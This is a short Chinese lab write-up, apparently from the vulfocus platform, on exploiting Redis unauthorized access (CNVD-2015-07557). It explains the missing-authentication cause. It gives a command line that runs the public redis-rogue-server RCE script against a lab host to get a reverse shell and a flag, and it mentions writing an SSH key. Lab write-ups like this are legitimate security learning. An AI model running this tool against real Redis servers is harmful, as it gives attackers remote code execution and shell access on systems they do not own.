vulfocus漏洞学习——redis 未授权访问 (CNVD-2015-07557)

目录

一、漏洞介绍

二、影响版本

三、漏洞复现

1.使用脚本

四、漏洞原理


一、漏洞介绍

Redis 是一个免费开源的键值存储数据库,数据默认存到内存中,用简单的 C 语言编写,能通过网络访问。该漏洞的成因是:在默认情况下,Redis会绑定到 0.0.0.0:6379,这意味着Redis会直接暴露到公网上,而此时如果又没有设置密码认证,会导致任意用户在可以访问到目标服务器的情况下未授权访问Redis并读取Redis的数据,还可以利用Redis提供的命令将自己的ssh公钥写入目标服务器,从而导致可以直接进行ssh登录目标服务器。

二、影响版本

明确受影响版本 Redis<=5.0.5

但由于是配置不当导致的漏洞,所以高版本如果配置不当也可能导致

三、漏洞复现

1.使用脚本

使用github上一键利用的脚本:GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE

复制代码
python3 redis-rogue-server.py --rhost 192.168.57.143 --rport 40585 --lhost 192.168.57.128 

这里选择反弹shell,用kali进行监听

成功得到flag

看到还有用写入ssh公钥的,但可能由于我们是docker环境,配置起来稍微要麻烦些,并且尝试了也没有成功。如果是直接部署在虚拟机中的应该会成功。

四、漏洞原理

(1)Redis 默认配置不启用密码认证,且默认监听0.0.0.0:6379,允许任意IP连接。所以我们可以直接通过redis-cli工具无密码连接到redis服务;

(2)同时,Redis提供config等敏感命令,攻击者可以通过这些命令写入恶意文件

相关推荐
程序员雷欧12 分钟前
大模型应用开发学习第八天
大数据·人工智能·学习
晓晓hh33 分钟前
JavaSE学习——set集合和Map映射
学习
لا معنى له2 小时前
Var-JEPA:联合嵌入预测架构的变分形式 —— 连接预测式与生成式自监督学习 ----论文翻译
人工智能·笔记·学习·语言模型
世人万千丶2 小时前
Flutter 框架跨平台鸿蒙开发 - 宠物语言翻译器应用
学习·flutter·华为·开源·harmonyos·鸿蒙
AI成长日志2 小时前
【笔面试算法学习专栏】哈希表基础:两数之和与字母异位词分组
学习·算法·面试
"菠萝"2 小时前
C#知识学习-021(文字关键字)
开发语言·学习·c#
chase。2 小时前
【学习笔记】让机器人“边想边动”——实时动作分块流策略的执行方法
笔记·学习·机器人
炽烈小老头2 小时前
【每天学习一点算法 2026/04/08】阶乘后的零
学习·算法
唐樽2 小时前
C++ 竞赛学习路线笔记
c++·笔记·学习
sensen_kiss3 小时前
CAN302 Technologies for E-Commerce 电子商务技术 Pt.6 市场营销与SEO(搜索引擎优化)
android·学习·搜索引擎